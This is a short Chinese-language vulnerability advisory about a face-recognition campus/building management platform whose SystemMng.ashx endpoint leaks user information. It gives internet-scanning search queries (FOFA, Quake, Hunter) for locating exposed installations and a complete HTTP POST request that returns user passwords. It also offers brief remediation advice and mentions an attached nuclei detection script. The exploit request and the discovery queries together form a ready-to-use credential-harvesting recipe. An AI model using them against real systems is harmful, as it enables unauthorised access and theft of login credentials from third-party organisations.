0x01 漏洞描述
脸爱云一脸通智慧管理平台 SystemMng 管理用户信息泄露,攻击者可利用此漏洞收集敏感信息,从而为下一步攻击做准备。
0x02 空间测绘
测绘语法
fofa: body="View/UserReserved/UserReservedTest.aspx"
quake:body:"View/UserReserved/UserReservedTest.aspx"
hunter:web.body="View/UserReserved/UserReservedTest.aspx"
0x03 漏洞复现
发送数据包返回包里包可查看用户密码。
登录验证密码:
POST /SystemMng.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 36
username=admin&funcName=SelOperators
0x04 修复意见
1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。 3、设置白名单访问。
0x05 nuclei脚本
0ada458d8620240523024924.7z
7z文件
753B
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容